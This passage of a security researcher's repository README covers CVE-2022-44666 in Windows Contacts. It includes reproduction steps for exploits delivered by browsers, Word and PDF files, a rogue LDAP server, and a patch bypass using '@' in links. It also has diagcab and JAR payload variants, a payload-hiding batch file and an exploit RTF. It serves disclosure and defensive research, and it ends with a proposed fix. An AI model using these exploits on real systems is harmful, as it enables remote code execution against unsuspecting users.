You'll find proofs of concept which only trigger a local binary like calc or notepad, and more complex proofs of concept that I've named weaponized exploits because they don't rely on files already present on the target — the payloads are served from the remote share. These PoCs & exploits are located in [./further-pocs/](./further-pocs/). 286 | 287 | This is a summary of target applications: 288 | 289 | * Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera. Note the "search-ms" URI protocol is [disabled for Mozilla Firefox at the time of writing this write-up][R.7]. 290 | * MS Word. 291 | * PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader). 292 | 293 | In order to reproduce (use an isolated lab network — the share and web server below are reachable by whatever host opens the PoC): 294 | 295 | 1. Set up a remote shared location (SMB or WebDAV). Copy the content of [./further-pocs/to-copy-in-remote-shared-location/](./further-pocs/to-copy-in-remote-shared-location/) into it. 296 | 2. Optionally, hide the payload files by running [./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat](./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat). 297 | 3. Modify the file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location. 298 | 4. Start a web server in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/. 299 | 5. Run the poc/exploit files depending on the case. 300 | 6. For further info, watch the videos located in [./videos](./videos): 301 | - 6.1. PoC for browsers: [./videos/browsers-poc.gif](./videos/browsers-poc.gif). 302 | 303 | ![alt text](<./videos/browsers-poc.gif>) 304 | 305 | - 6.2. Exploit for browsers: [./videos/browsers-exploit.gif](./videos/browsers-exploit.gif). 306 | 307 | ![alt text](<./videos/browsers-exploit.gif>) 308 | 309 | - 6.3. PoC for MS Word: [./videos/msword-poc.gif](./videos/msword-poc.gif). 310 | 311 | ![alt text](<./videos/msword-poc.gif>) 312 | 313 | - 6.4. Exploit for MS Word: [./videos/msword-exploit.gif](./videos/msword-exploit.gif). 
314 | 315 | ![alt text](<./videos/msword-exploit.gif>) 316 | 317 | - 6.5. PoC for PDF Readers: [./videos/pdfreaders-poc.gif](./videos/pdfreaders-poc.gif). 318 | 319 | ![alt text](<./videos/pdfreaders-poc.gif>) 320 | 321 | - 6.6. Exploit for PDF Readers: [./videos/pdfreaders-exploit.gif](./videos/pdfreaders-exploit.gif). 322 | 323 | ![alt text](<./videos/pdfreaders-exploit.gif>) 324 | 325 | Additionally, these are all the files for further exploitation: 326 | 327 | + [./further-pocs/browsers/poc/KB5014666-hotfix.vcf](./further-pocs/browsers/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 328 | + [./further-pocs/browsers/poc/poc.html](./further-pocs/browsers/poc/poc.html): HTML file to download KB5014666-hotfix.vcf. 329 | + [./further-pocs/browsers/remote-weaponized-by-searchms/exploit.html](./further-pocs/browsers/remote-weaponized-by-searchms/exploit.html): HTML file to trigger "search-ms" in a remote shared location. 330 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.vcf](./further-pocs/MSWord/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 331 | + [./further-pocs/MSWord/poc/poc.docx](./further-pocs/MSWord/poc/poc.docx): Word file in DOCX format which triggers a remote template aka htmlfile activex. 332 | + [./further-pocs/MSWord/poc/poc.rtf](./further-pocs/MSWord/poc/poc.rtf): Word file in RTF format which triggers a remote template aka htmlfile activex. 333 | + [./further-pocs/MSWord/poc/poc.html](./further-pocs/MSWord/poc/poc.html): remote template aka htmlfile activex. 334 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx](./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx): Word file in DOCX format which triggers a remote template aka htmlfile activex. 335 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf](./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf): Word file in RTF format which triggers a remote template aka htmlfile activex. 
336 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/poc.html](./further-pocs/MSWord/remote-weaponized-by-searchms/poc.html): Remote template aka htmlfile activex which triggers "search-ms" in a remote shared location. 337 | + [./further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf](./further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 338 | + [./further-pocs/PDFreaders/poc/poc-vcf.pdf](./further-pocs/PDFreaders/poc/poc-vcf.pdf): PDF file which triggers the default browser to download and execute KB5014666-hotfix.vcf. 339 | + [./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html](./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html): HTML file which triggers "search-ms" in a remote shared location to be used by PDF Readers. 340 | + [./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf](./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf): PDF which triggers the default browser to execute the URI protocol "search-ms". 341 | 342 | 343 | ## Contact Files 344 | 345 | After receiving ***Update 2022/07/21*** from MSRC, I decided to take a look into the Contact file extension, as it would confirm whether or not it's the same case as the one found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe, located in "C:\Program Files\Windows Mail", it's possible to convert all the VCF files to Contact files. 346 | 347 | ![alt text](<./images/convert-vcf-to-contact-wabmig.png>) 348 | 349 | And as mentioned in the intro updates, these files are opened by Windows Contacts (default program). 350 | 351 | The steps to reproduce are the same as those used for VCF files. 
The same restrictions observed for VCF files apply to Contact files, that is, it's not possible to use remote shared locations in the attribute "href", but it's still possible to use local paths or the URL protocol "search-ms". 352 | 353 | These are all the files added or modified to exploit Contact files: 354 | 355 | + [./further-pocs/browsers/poc/KB5014666-hotfix.vcf](./further-pocs/browsers/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries using VCF format. 356 | + [./further-pocs/browsers/poc/KB5014666-hotfix.contact](./further-pocs/browsers/poc/KB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 357 | + [./further-pocs/browsers/poc/poc-vcf.html](./further-pocs/browsers/poc/poc-vcf.html): HTML file to download KB5014666-hotfix.vcf. 358 | + [./further-pocs/browsers/poc/poc-contact.html](./further-pocs/browsers/poc/poc-contact.html): HTML file to download KB5014666-hotfix.contact. 359 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.vcf](./further-pocs/MSWord/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries using VCF format. 360 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.contact](./further-pocs/MSWord/poc/KB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 361 | + [./further-pocs/PDFreaders/poc/KB5014666-hotfix.contact](./further-pocs/PDFreaders/poc/KB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 362 | + [./further-pocs/PDFreaders/poc/poc-contact.pdf](./further-pocs/PDFreaders/poc/poc-contact.pdf): PDF file to download KB5014666-hotfix.contact. 363 | + [./further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix.contact](./further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix.contact): Payload which executes binaries by "search-ms" in a remote shared location using Contact format. 
364 | + [./report-pocs/exploit.contact](./report-pocs/exploit.contact): Same file as exploit.VCF, in Contact file format. 365 | 366 | 367 | ## URL protocol LDAP 368 | 369 | As mentioned above, this further research led me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to the ldap URI scheme. 370 | 371 | 372 | ```js 373 | ... 374 | Windows Registry Editor Version 5.00 375 | 376 | [HKEY_CLASSES_ROOT\LDAP] 377 | @="URL:LDAP Protocol" 378 | "EditFlags"=hex:02,00,00,00 379 | "URL Protocol"="" 380 | 381 | [HKEY_CLASSES_ROOT\LDAP\Clsid] 382 | @="{228D9A81-C302-11cf-9AA4-00AA004A5691}" 383 | 384 | [HKEY_CLASSES_ROOT\LDAP\shell] 385 | 386 | [HKEY_CLASSES_ROOT\LDAP\shell\open] 387 | 388 | [HKEY_CLASSES_ROOT\LDAP\shell\open\command] 389 | @=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\ 390 | 00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\ 391 | 4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\ 392 | 00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00 393 | ... 394 | ``` 395 | 396 | That is: 397 | 398 | ``` 399 | "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" 400 | ``` 401 | 402 | So, just by setting up a rogue LDAP server and serving the payload data, it's possible to use this URL protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that I was unable to get this working with the attribute "wwwhomepage" as indicated [here][R.8], but it should theoretically work. 403 | 404 | The crafted ldif content is just something like this: 405 | 406 | 407 | ```html 408 | ... 
409 | dn: dc=org 410 | dc: org 411 | objectClass: dcObject 412 | 413 | dn: dc=example,dc=org 414 | dc: example 415 | objectClass: dcObject 416 | objectClass: organization 417 | 418 | dn: ou=people,dc=example,dc=org 419 | objectClass: organizationalUnit 420 | ou: people 421 | 422 | dn: cn=Microsoft,ou=people,dc=example,dc=org 423 | cn: Microsoft 424 | gn: Microsoft 425 | company: Microsoft 426 | title: Microsoft KB5001337-hotfix 427 | mail:">Run-installer... 428 | url:">Run-installer... 429 | wwwhomepage:">Run-installer... 430 | objectclass: top 431 | objectclass: person 432 | objectClass: inetOrgPerson 433 | ... 434 | ``` 435 | 436 | And the code for the rogue ldap server was borrowed from the quick start server of the ldaptor project, located [over here][R.9]. 437 | 438 | This is a summary of target applications: 439 | 440 | * Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera. 441 | * MS Word. 442 | * PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader). 443 | 444 | The steps to reproduce are: 445 | 446 | 1. Copy [./further-pocs](./further-pocs) into a remote shared location (SMB or WebDav). 447 | 2. If wanted, hide the files by running [./further-pocs/MSWord/setup-hidden.bat](./further-pocs/MSWord/setup-hidden.bat). 448 | 3. Install ldaptor with pip: pip install ldaptor. Note this has been tested on Python 2.7 x64. 449 | 4. Start the rogue ldap server located in [./further-pocs/ldap-rogue-server/ldap-server.py](./further-pocs/ldap-rogue-server/ldap-server.py) 450 | 5. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/url-protocol-ldap/. 451 | 6. Run the exploit files depending on the case. 452 | 7. For further info, watch the videos located in [./videos](./videos): 453 | - 7.1. For browsers: [./videos/ldap-browsers-exploit.gif](./videos/ldap-browsers-exploit.gif). 454 | 455 | ![alt text](<./videos/ldap-browsers-exploit.gif>) 456 | 457 | - 7.2. 
For MS Word: [./videos/ldap-msword-exploit.gif](./videos/ldap-msword-exploit.gif). 458 | 459 | ![alt text](<./videos/ldap-msword-exploit.gif>) 460 | 461 | - 7.3. For PDF Readers: [./videos/ldap-pdfreaders-exploit.gif](./videos/ldap-pdfreaders-exploit.gif). 462 | 463 | ![alt text](<./videos/ldap-pdfreaders-exploit.gif>) 464 | 465 | These are the additional files to exploit the URL protocol ldap: 466 | 467 | + [./further-pocs/browsers/url-protocol-ldap/exploit.html](./further-pocs/browsers/url-protocol-ldap/exploit.html): HTML file to load the URL protocol ldap against a rogue ldap server which returns crafted data for mail and urls. 468 | + [./further-pocs/MSWord/url-protocol-ldap/poc.html](./further-pocs/MSWord/url-protocol-ldap/poc.html): remote template aka htmlfile activex to load the URL protocol ldap against a rogue ldap server which returns crafted data for mail and urls. 469 | + [./further-pocs/MSWord/url-protocol-ldap/exploit.rtf](./further-pocs/MSWord/url-protocol-ldap/exploit.rtf): Word file in RTF format which triggers a remote template aka htmlfile activex. 470 | + [./further-pocs/MSWord/url-protocol-ldap/exploit.docx](./further-pocs/MSWord/url-protocol-ldap/exploit.docx): Word file in DOCX format which triggers a remote template aka htmlfile activex. 471 | + [./further-pocs/PDFreaders/url-protocol-ldap/exploit.html](./further-pocs/PDFreaders/url-protocol-ldap/exploit.html): HTML file to load the URL protocol ldap against a rogue ldap server which returns crafted data for mail and urls. 472 | + [./further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf](./further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf): PDF which triggers the default browser to execute the URI protocol "ldap". 473 | + [./further-pocs/ldap-rogue-server/ldap-server.py](./further-pocs/ldap-rogue-server/ldap-server.py): Python script based on the server sample for ldaptor, which runs on Python 2.7, and serves the crafted data to exploit the bug through the ldif attributes mail, url and wwwhomepage. 
474 | 475 | ## CVE-2022-44666: Patch analysis and incomplete fix 476 | 477 | On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as [CVE-2022-44666][R.10]. 478 | 479 | The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been: 480 | 481 | + MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch) 482 | + MD5: D1708215AD2624E666AFD97D97720E81 (post-patch) 483 | 484 | Diffing the affected library (wab32.dll) with [Diaphora][R.11] by [@matalaz][R.12], we'll find out some new functions: 485 | 486 | ![alt text](<./bypass/images/unmatched-diaphora-wab32dll.png>) 487 | 488 | And these are the partial matches: 489 | 490 | ![alt text](<./bypass/images/partialmatches-diaphora-wab32dll.png>) 491 | 492 | Taking a look into the new code in function "fnSummaryProc": 493 | 494 | ```cpp 495 | __int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4) 496 | { 497 | 498 | ... 499 | 500 | if ( v26 <= 0x824 && (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) ) // (1) 501 | { 502 | v38 = (unsigned __int16 *)2085; 503 | v39 = &CPercentEncodeRFC3986::`vftable'; 504 | v40 = v23; 505 | v41 = v26; 506 | v28 = CPercentEncodeString::Encode( 507 | (CPercentEncodeString *)&v39, 508 | (unsigned __int16 *)&Dst, 509 | (unsigned __int64 *)&v38, 510 | v25); 511 | v29 = v7; 512 | if ( !v28 ) 513 | { 514 | v30 = (const unsigned __int16 *)&Dst; 515 | LABEL_44: 516 | SafeExecute(v29, v24, v30); // (2) 517 | return 1i64; 518 | } 519 | } 520 | else 521 | { 522 | if ( v23 ) 523 | v32 = IsInternetAddress(v23, &v38); 524 | else 525 | v32 = 0; 526 | v29 = v7; 527 | if ( v32 ) 528 | { 529 | v30 = v23; 530 | goto LABEL_44; // (3) 531 | } 532 | } 533 | v31 = GetParent(v29); 534 | ShowMessageBox(v31, 0xFE1u, 0x30u); // (4) 535 | return 1i64; 536 | } 537 | ... 538 | } 539 | ``` 540 | After the fix, the new code calls to the function "SafeExecute" (2) or show a message box (4). 
541 | 542 | ![alt text](<./bypass/images/show-messagebox-wabexe.png>) 543 | 544 | To reach the call to the function "SafeExecute" (2), it is possible to follow the code flow in (1): 545 | 546 | ```cpp 547 | _BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn) 548 | { 549 | const WCHAR *v1; // rbx 550 | _BOOL8 result; // rax 551 | DWORD pcchOut; // [rsp+30h] [rbp-68h] 552 | char Dst; // [rsp+40h] [rbp-58h] 553 | 554 | v1 = pszIn; 555 | result = 0; 556 | if ( UrlIsW(pszIn, URLIS_URL) ) // (5) 557 | { 558 | memset_0(&Dst, 0, 0x40ui64); 559 | pcchOut = 32; 560 | if ( UrlGetPartW(v1, (LPWSTR)&Dst, &pcchOut, 1u, 0) >= 0 561 | && (!(unsigned int)StrCmpICW(&Dst, L"http") || !(unsigned int)StrCmpICW(&Dst, L"https")) ) // (6) 562 | { 563 | result = 1; 564 | } 565 | } 566 | return result; 567 | } 568 | ``` 569 | 570 | This function first checks if the [URL is valid in (5)][R.13]; then, in (6), it checks whether or not the scheme part of the URL is "http" or "https". This code path looks safe enough. Coming back to the function "fnSummaryProc", there's another code path, in (3), that could help bypass the fix. 
571 | 572 | ```cpp 573 | __int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2) 574 | { 575 | unsigned __int16 v2; // ax 576 | unsigned __int16 **v3; // r14 577 | unsigned __int16 *v4; // rdi 578 | unsigned __int16 *v5; // r15 579 | unsigned __int16 v6; // dx 580 | unsigned __int16 *v7; // r8 581 | unsigned __int16 *v8; // rcx 582 | WCHAR v9; // ax 583 | _WORD *v10; // rsi 584 | int v11; // ebp 585 | LPWSTR v12; // rax 586 | unsigned __int16 *v14; // rax 587 | 588 | v2 = *a1; 589 | v3 = a2; 590 | v4 = a1; 591 | v5 = a1; 592 | while ( v2 && v2 != 0x3C ) 593 | { 594 | a1 = CharNextW(a1); 595 | v2 = *a1; 596 | } 597 | v6 = *a1; 598 | v7 = a1; 599 | if ( *a1 ) 600 | { 601 | v8 = a1 + 1; 602 | v4 = v8; 603 | } 604 | else 605 | { 606 | v8 = v4; 607 | } 608 | v9 = *v8; 609 | v10 = (_WORD *)((unsigned __int64)v7 & -(__int64)(v6 != 0)); 610 | v11 = v6 != 0; 611 | if ( *v8 & 0xFFBF ) 612 | { 613 | while ( v9 <= 0x7Fu && v9 != 0xD && v9 != 0xA ) 614 | { 615 | if ( v9 == 0x40 ) // (7) 616 | { 617 | v14 = CharNextW(v8); 618 | if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) ) // (8) 619 | return 0i64; 620 | if ( v3 ) 621 | { 622 | if ( v10 ) 623 | { 624 | *v10 = 0; 625 | TrimSpaces(v5); 626 | } 627 | *v3 = v4; 628 | } 629 | return 1i64; 630 | } 631 | v12 = CharNextW(v8); 632 | v8 = v12; 633 | v9 = *v12; 634 | if ( !v9 ) 635 | return 0i64; 636 | } 637 | } 638 | return 0i64; 639 | } 640 | ``` 641 | 642 | One thing caught my attention about this in (7), where the code is checking whether it exists a char "@". 
Then, it calls the function "IsDomainName" to check whether or not the string after the "@" character is a domain name: 643 | 644 | ```cpp 645 | __int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3) 646 | { 647 | int v3; // edi 648 | int v4; // ebx 649 | int v5; // er9 650 | __int64 v6; // rdx 651 | 652 | v3 = a3; 653 | v4 = a2; 654 | if ( !a1 ) 655 | return 0i64; 656 | LABEL_2: 657 | v5 = *a1; 658 | if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E ) 659 | return 0i64; 660 | while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) ) 661 | { 662 | if ( (unsigned __int16)v5 >= 0x80u ) 663 | return 0i64; 664 | if ( (unsigned __int16)(v5 - 10) <= 0x36u ) 665 | { 666 | v6 = 19140298416324617i64; 667 | if ( _bittest64(&v6, (unsigned int)(v5 - 10)) ) 668 | return 0i64; 669 | } 670 | if ( (_WORD)v5 == 46 ) 671 | { 672 | a1 = CharNextW(a1); 673 | if ( a1 ) 674 | goto LABEL_2; 675 | return 0i64; 676 | } 677 | a1 = CharNextW(a1); 678 | v5 = *a1; 679 | } 680 | if ( v4 ) 681 | { 682 | if ( (_WORD)v5 != 0x3E ) 683 | return 0i64; 684 | if ( v3 ) 685 | *a1 = 0; 686 | } 687 | return 1i64; 688 | } 689 | ``` 690 | 691 | So the bypass for the fix is pretty simple. It's just necessary to use a single "@" character. SysLink href attributes like these will successfully bypass the fix: 692 | 693 | ```html 694 | hidden\@payload.lnk 695 | hidden\@payload.exe 696 | ``` 697 | 698 | ```html 699 | hidden@payload.lnk 700 | hidden@payload.exe 701 | ``` 702 | 703 | For further info, there's a video for a [standalone contact file](./bypass/videos/simple-payload.gif). 704 | 705 | ![alt text](<./bypass/videos/simple-payload.gif>) 706 | 707 | Proof of concept located in [./bypass/report-pocs](./bypass/report-pocs). 708 | 709 | And another one for [MS Word and LDAP url protocol](./bypass/videos/ldap-msword-exploit.gif). 710 | 711 | ![alt text](<./bypass/videos/ldap-msword-exploit.gif>) 712 | 713 | Proof of concept located in [./bypass/further-pocs](./bypass/further-pocs). 
714 | 715 | One day after the patch release, this information was sent to MSRC. Unfortunately, the case has recently been closed with no further info about it. 716 | 717 | ![alt text](<./bypass/images/msrc-reply-case-closed.png>) 718 | 719 | ## Diagcab file as payload 720 | 721 | After [CVE-2022-30190][R.14], also known as the [Follina vulnerability][R.15], and [CVE-2022-34713][R.16], also known as the [DogWalk vulnerability][R.17], a [publicly known but underrated technique][R.18] was revived thanks to [@buffaloverflow][R.19]. My mate and friend [Eduardo Braun Prado][R.20] gave me the idea to use this technique over here. 722 | 723 | There are some prerequisites to do this: 724 | 725 | 1. The target user has to belong to the administrators group. If not, there's a UAC prompt. 726 | 2. The diagcab file has to be signed, so the code signing certificate must have been installed on the target computer. 727 | 728 | A real attack scenario would involve stealing a code signing certificate that is actually installed on the target system. But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named [@payload.diagcab](./bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab). 729 | 730 | So in order to repro, it's necessary to install the certificate located in [cert.cer](./bypass/diagcab-pocs/cert.cer) under Trusted Root Certificate Authority [like this](./bypass/videos/install-certificate.gif): 731 | 732 | ![alt text](<./bypass/videos/install-certificate.gif>) 733 | 734 | To finally elevate the privileges, a token stealing/impersonation could be used. In this case, the ["parent process" technique][R.21] was the [chosen one][R.22]. A modified version of this script was included inside the resolver scripts. 735 | 736 | For further info, there's a video for [MS Word and LDAP url protocol](./bypass/videos/ldap-msword-diagcab-exploit.gif). 
737 | 738 | ![alt text](<./bypass/videos/ldap-msword-diagcab-exploit.gif>) 739 | 740 | Proof of concept located in [./bypass/diagcab-pocs](./bypass/diagcab-pocs). 741 | 742 | ## JAR files as payload 743 | 744 | ***Update 2023/06/19:*** After reading [@pfiatde][R.24]'s [post on "ZipJar"][R.25], this interesting information makes JAR files a good candidate to be used as payload for this vulnerability, which, by the way, is still a 0day nowadays: as the MotW gets ignored, it doesn't require accepting any prompt. 745 | 746 | The JAR payload was taken from the GitHub repository [calc_security_poc][R.26]. 747 | 748 | Attached there's a little builder, [create-poc.py](./bypass/jar-poc), to make your own POC from a template. 749 | 750 | ![alt text](<./bypass/videos/jar-exploit.gif>) 751 | 752 | Don't forget to give thanks to [@microlovu][R.27] and [@mlftsecresponse][R.28]. 😂 753 | 754 | ## Proposed fix 755 | 756 | Remember the vulnerable code in the function "fnSummaryProc": 757 | 758 | ```cpp 759 | ... 760 | LABEL_44: 761 | SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute 762 | return 1i64; 763 | } 764 | } 765 | else 766 | { 767 | if ( v23 ) 768 | v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@" 769 | else 770 | v32 = 0; 771 | v29 = v7; 772 | if ( v32 ) 773 | { 774 | v30 = v23; 775 | goto LABEL_44; 776 | } 777 | } 778 | ... 779 | ``` 780 | 781 | The function "IsInternetAddress" was intentionally created to check if the href attr corresponds to an email address. So my proposed fix (following the imported functions that the library already uses) would be: 782 | 783 | ```cpp 784 | ... 785 | if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check out the href really starts with "mailto:" 786 | { 787 | v30 = v23; 788 | goto LABEL_44; 789 | } 790 | ... 791 | ``` 792 | 793 | As simple as that: it's only necessary to add this check before calling "SafeExecute". 
Just by testing whether the target string (v23) starts with "mailto:", the bug would be fully fixed IMHO. 794 | 795 | ## Unofficial fix 796 | 797 | Some days/weeks ago, when I contacted [@mkolsek][R.30] of [0patch][R.23] to inform him about this issue, he (who by the way is always very kind to me) told me this has had [an unofficial fix for Windows 7 since then][R.29] (4 years ago). That was a surprise and good news! 798 | 799 | It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends "http://" to the attacker-controlled string passed by the href attr if it doesn't start with "mailto:", "http://" or "https://", which is enough to fully fix the issue. Now it's going to be extended to the latest Windows versions; it's only necessary to update some offsets. 800 | 801 | ![alt text](<./videos/micropatch-0patch.gif>) 802 | 803 | Either way, it would be better to get an official patch. 804 | 805 | ## Acknowledgments 806 | 807 | + [@hyp3rlinx][R.1]: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. ~~He should also have been credited for finding this out, but unfortunately I was unable to contact him just in time~~. It's already been done (***Update 2023/02/08***). 808 | + [@Edu_Braun_0day][R.20]: who also worked on [this issue][R.31]. 809 | + [@mkolsek][R.30]. 810 | + [@matalaz][R.12]. 811 | + [@buffaloverflow][R.19]. 812 | + [@msftsecresponse][R.2]. 813 | + ... 
814 | 815 | 816 | By [@j00sean](https://twitter.com/j00sean) 817 | 818 | [R.1]: "@hyp3rlinx" 819 | [R.2]: "@msftsecresponse" 820 | [R.3]: "@thezdi" 821 | [R.4]: "John Page (aka hyp3rlinx)'s exploit fully disclosed more than 4 years ago" 822 | [R.5]: "ZDI-19-121" 823 | [R.6]: "MS Documentation about syslink controls" 824 | [R.7]: "CVE-2022-34478: search-ms disabling for Mozilla Firefox" 825 | [R.8]: "LDIF attributes and associated fields documentation" 826 | [R.9]: "ldaptor server quick start" 827 | [R.10]: "CVE-2022-44666" 828 | [R.11]: "Diaphora" 829 | [R.12]: "@matalaz" 830 | [R.13]: "UrlIsW function" 831 | [R.14]: "CVE-2022-30190" 832 | [R.15]: "Follina vulnerability" 833 | [R.16]: "CVE-2022-34713" 834 | [R.17]: "DogWalk vulnerability" 835 | [R.18]: "Diagcab files" 836 | [R.19]: "@buffaloverflow" 837 | [R.20]: "@Edu_Braun_0day" 838 | [R.21]: "Parent process technique" 839 | [R.22]: "Getsystem via parent process" 840 | [R.23]: "0patch" 841 | [R.24]: "@pfiatde" 842 | [R.25]: "ZipJar, a little bit unexpected attack chain" 843 | [R.26]: "calc_security_poc" 844 | [R.27]: "@microlovu" 845 | [R.28]: "@mlftsecresponse" 846 | [R.29]: "Micropatch released 4 years ago" 847 | [R.30]: "@mkolsek" 848 | [R.31]: "Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution" 849 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\@payload.diagcab 2 | attrib +s +h +r hidden 3 | 
-------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 